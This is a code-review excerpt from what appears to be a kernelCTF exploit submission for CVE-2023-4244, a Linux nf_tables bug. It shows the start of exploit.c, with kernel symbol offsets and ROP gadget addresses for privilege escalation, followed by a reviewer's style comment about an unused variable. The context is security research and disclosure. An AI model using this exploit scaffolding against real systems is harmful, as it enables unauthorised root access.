pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c

```diff
@@ -0,0 +1,847 @@
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sched.h>
+#include <unistd.h>
+#include <arpa/inet.h>
+#include <fcntl.h>
+#include <err.h>
+#include <errno.h>
+#include <net/if.h>
+#include <sys/wait.h>
+#include <sys/syscall.h>
+
+#include <linux/rtnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <linux/netfilter.h>
+#include <linux/keyctl.h>
+#include <stddef.h>
+
+#include <libmnl/libmnl.h>
+#include <libnftnl/table.h>
+#include <libnftnl/chain.h>
+#include <libnftnl/set.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/expr.h>
+
+#include "netlink_utils.h"
+
+#define BUF_SIZE        0x1000 * 0x100
+
+#define FIND_TASK_BY_VPID                           0x1bbe60
+#define SWITCH_TASK_NAMESPACES                      0x1c3a30
+#define COMMIT_CREDS                                0x1c55a0
+#define INIT_CRED                                   0x2876960
+#define INIT_NSPROXY                                0x2876720
+#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE  0x1201146
+#define OOPS_IN_PROGRESS                            0x3444338
+#define RCU_READ_LOCK_NESTING_OFF                   0x474
+
+#define PUSH_RBX_POP_RSP   0xf89a31    // 0xffffffff81f89a31 : push rbx ; and byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; jmp 0xffffffff82404c80
+#define POP_RDI_RET        0x0e89fe    // 0xffffffff810e89fe : pop rdi ; jmp 0xffffffff82404c80
+#define POP_RSI_RET        0x0e8a70    // 0xffffffff810e8a70 : pop rsi ; jmp 0xffffffff82404c80
+#define ADD_RAX_RSI_RET    0x038160    // 0xffffffff81038160 : add rax, rsi ; jmp 0xffffffff82404c80
+#define POP_RCX_RET        0x11581f6   // 0xffffffff821581f6 : pop rcx ; jmp 0xffffffff82404c80
+#define MOV_RAX_RCX_RET    0x72718b    // 0xffffffff8172718b : mov qword ptr [rax], rcx ; jmp 0xffffffff82404c80
+#define MOV_RDI_RAX_RET    0x1f4605    // 0xffffffff811f4605 : mov rdi, rax ; test esi, esi ; jne 0xffffffff811f45b4 ; jmp 0xffffffff82404c80
+#define POP_RSP_RET        0x008999    // 0xffffffff81008999 : pop rsp ; jmp 0xffffffff82404c80
+#define MOV_RSI_RDI_RET    0x2fcc79    // 0xffffffff812fcc79 : mov qword ptr [rsi], rdi ; jmp 0xffffffff82404c80
+
+uint64_t kbase = 0;
+
+char* buf;
+struct nlmsghdr * nlh;
+struct mnl_nlmsg_batch * batch;
+struct mnl_socket * nl;
+uint32_t portid;
```

Comment:
This variable is only set, but never used again, can we remove it if it is not necessary?

See our (draft) [style guide](https://google.github.io/security-research/kernelctf/style_guide#unused-code) for more details.